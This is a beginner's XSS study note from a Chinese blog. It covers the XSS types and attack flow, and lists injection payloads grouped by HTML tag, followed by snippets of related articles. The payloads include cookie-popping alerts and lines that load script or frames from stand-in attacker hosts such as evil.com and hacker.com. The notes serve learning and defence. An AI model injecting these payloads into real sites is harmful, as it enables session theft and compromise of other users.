小白专用,XSS笔记

最新推荐文章于 2024-03-03 13:30:00 发布
最新推荐文章于 2024-03-03 13:30:00 发布
阅读量130 收藏
点赞数
文章标签: html5 html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jhfjdf/article/details/118572979
版权

XSS漏洞攻击笔记

XSS是什么

XSS又叫CSS,跨站脚本式攻击。指的是攻击者向web页面插入了恶意的HTML代码,当其他的用户在访问该web页面时,插入的HTML恶意代码将会被执行,从而达到获取用户信息,攻击用户的效果。XSS是针对用户层面的攻击。

XSS的分类

  • 反射型XSS:用户访问已被插入恶意代码的链接,恶意代码被执行而产生的攻击
  • 存储型XSS:攻击者将恶意代码插入到了web服务器中被存储起来,用户在进入某一页面时,恶意代码会随着网页的打开或者某些操作而被执行
  • DOM型XSS:本质上是反射型XSS的一种。恶意代码被插入在url中,DOM型XSS与前两者不同的是其只在客户端进行解析,不需要服务器的解析响应。

其中,存储型XSS危害性较大,能被执行多次(持久化),能造成蠕虫和盗窃cookie。

XSS攻击的大体流程

  1. 攻击者插入恶意代码到web网站上
  2. 其他用户在访问目标服务器的时候执行了恶意代码
  3. 恶意代码被用户解析
  4. 攻击者的服务器接收到用户信息
  5. 攻击者通过其自身服务器获取到用户信息

XSS攻击的常用标签代码

<script>标签
<script src=http://xxx.com/xss.js></script>  	#引用外部的xss
<script> alert("hack")</script>   				#弹出hack
<script>alert(document.cookie)</script> 		#弹出cookie

<imd>标签
<img  src=1  onerror=alert("hack")>
<img  src=1  onerror=alert(/hack/)>
<img  src=1  onerror=alert(document.cookie)>  #弹出cookie
<img  src=1  onerror=alert(123)>      注:对于数字,可以不用引号
<img  src="javascript:alert("XSS");">
<img  dynsrc="javascript:alert('XSS')">
<img  lowsrc="javascript:alert('XSS')">

<body>标签
<body onload=alert("XSS")>
<body background="javascript:alert("XSS")">

<iframe>标签
<iframe src=”http://evil.com/xss.html”>

<input>标签
<input type="image" src="javascript:alert('XSS');">

<link>标签
<link rel="stylesheet" href="javascript:alert('XSS');">

<table>标签
<table background="javascript:alert('XSS')">
 
<td background="javascript:alert('XSS')">

<div>标签
<div style="background-image: url(javascript:alert('XSS'))">
 
<div style="width: expression(alert('XSS'));">

<object>标签
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">

XSS攻击的各种绕过方式

无过滤

直接在参数后加js代码,使得浏览器解析执行

过滤了< script>标签

XSS有关的一些函数

htmlspecialchars() 函数

把一些预定义的字符转换为 HTML 实体。

预定义的字符是:

& (和号)成为 &amp;
" (双引号)成为 &quot;
' (单引号)成为 '
< (小于)成为 &lt;
> (大于)成为 &gt;

replace()函数

将特定字符或字符串转换成另一种特定字符或字符串

strpos()函数

查找字符串首次出现的位置,若未找到,则返回false。反之,返回true。

前路在寻
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS漏洞的与标签的那些个事~
kangzinian的博客
11-29 3242
XSS漏洞的与标签的那些个事~0x00(div)0x01(textarea)0x02(input)0x030x040x050x060x070x080x090x0A0x0B0x0C0x0D0x0E0x0F0x100x110x12 0x00(divdiv标签里面插入script即可 0x01(textarea) textarea内嵌js脚本,不会被执行。这个时候,我们闭合textarea标签即可 0x02(input) 借助sql注入的方法,把input标签闭合。我设计了一个点击事件,点击弹出 0x0
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5747
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
学习笔记-xss
weixin_44063924的博客
09-05 702
本文章仅作学习自用,若有不对欢迎批评斧正。 目录 一、XSS简介 二、XSS 跨站漏洞原理及分类 2.1原理 2.2分类 总结 一、XSS简介 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常
常见漏洞之xss
m0_52923241的博客
03-13 1098
简介 攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览这些网页,从而触发恶意执行代码 危害 1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号; 2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作 3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志等 4.强制弹出广告页面,刷流量等 5…进行恶意操作,例如任意篡改页面信息,删除文章等,传播跨站脚本蠕虫,网页挂马等 6.进行基于大量的客户端攻击,如DDOS攻击 7.结合其它漏洞,
xss闭合标签用法
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-05 500
div1
xss game挑战笔记.pdf
02-11
### XSS Game挑战笔记知识点概述 #### 一、XSS攻击简介 XSS(Cross Site Scripting)即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时,嵌入其中的...
XSS.rar_XSS
09-22
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全问题,尤其是在Web前端开发中尤为突出。XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下...
xss_javaxss_XSS_
10-04
在网络安全领域,XSS(Cross-Site Scripting)攻击是一种常见的威胁,它允许攻击者通过在网页中注入恶意脚本,来劫持用户会话、窃取敏感信息或执行其他恶意操作。Java作为广泛使用的服务器端编程语言,也可能会遭遇...
springboot整合XSS
03-20
本文将深入探讨如何在Spring Boot项目中整合并预防XSS(Cross-Site Scripting)攻击。XSS是一种常见的网络攻击方式,通过注入恶意脚本到网页中,来窃取用户数据或者执行恶意操作。 一、理解XSS攻击 XSS攻击主要...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
跨站脚本攻击(XSS)详解
Karka_的博客
01-02 1235
XSS(Cross Site Script)攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一开始,这种攻击的演示案例是跨域的,所以叫做"跨站脚本"。现在是否跨域已经不再重要,但是名字一直沿用下来。XSS长期以来被列为客户端Web安全中的头号大敌。因为XSS破坏力强大,且产生的场景复杂,难以一次性解决。下面举个XSS的例子php?如果用户提交了一段HTML代码alert(/xss/)就会在页面中执行,弹出框显示/xss/。
XSS跨站脚本漏洞详解
Zeker62的博客
08-13 460
本文参考资料:《Web安全深度剖析》张炳帅 跨站脚本漏洞:2017年OWASP TOP 7 XSS又叫CSS(Cross Site Scripting),但是和指层叠样式表 (Cascading Style Sheets) 缩写重名,所以叫XSS XSS是指攻击者在网页中嵌入脚本代码,通常是JavaScript代码,当用户使用浏览器看这些已经被嵌入恶意代码的网页的时候,这些代码就会执行,进行攻击。 XSS 属于客户端的攻击,但是中间体是服务器,并且可以当作入侵服务器的跳板:比如管理员执行了恶意代码,.
彻底理解前端安全面试题(1)—— XSS 攻击,3种XSS攻击详解,建议收藏(含源码)
最新发布
Karka_的博客
03-03 1513
xss 攻击的三种类型都用代码模拟了,我的仓库地址如下,欢迎查看内容较多,难免疏漏,如有问题,欢迎指正。这是一系列的文章,关于网络安全的内容还有 CSRF、CORS 和中间人攻击的内容没有总结,持续更新中,欢迎关注。第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
xss(跨站脚本攻击)详解
lonmar的博客
06-25 5427
xss跨站脚本攻击 读书心得,技术总结
XSS插入绕过一些方式总结
热门推荐
煜铭2011
05-05 7万+
0x00前言 我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。 0x01 常规插入及其绕过 1 Script 标签 绕过进行一次移除操作: <scr<script&g...
XSS攻击之基础篇:HTML标签与字符串的渲染
weixin_30687051的博客
11-23 395
<body> XSS攻击之基础篇:HTML标签与字符串的渲染 测试 <div class="a1"> </div> <div class="a2"> </div> <script type="text/javascript"> $(func...
XSS 代码总结
bcbobo21cn的专栏
12-08 1万+
XSS跨站测试代码大全 http://www.cnblogs.com/dsky/archive/2012/04/06/2434768.html '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3
xss基础知识
土拨鼠挖洞中的博客
10-03 5340
  XSS 概述 指攻击者利用网站程序对用户的输入输出过滤不足,导致恶意代码在页面执行,对受害者造成cookie资料窃取、会话劫持、钓鱼欺骗等危害;     XSS危害 1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号; 2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作 3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、...
xss其他标签下的js用法总结大全
binggoogle的专栏
07-25 6127
xss其他标签下的js用法总结大全 https://www.91ri.org/16155.html 前段时间我遇到一个问题,就是说普通的平台获取cookie的语句为 实际上我们的测试语句可能为↓ alert("90sec") 也就是说js语句实际上是位于↓ 的中间。 包括、、、、、、标签等情况下的xss构造。 所以我们就需要了解各种标签下的js用法,不然很多时候不可以使用就很麻
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值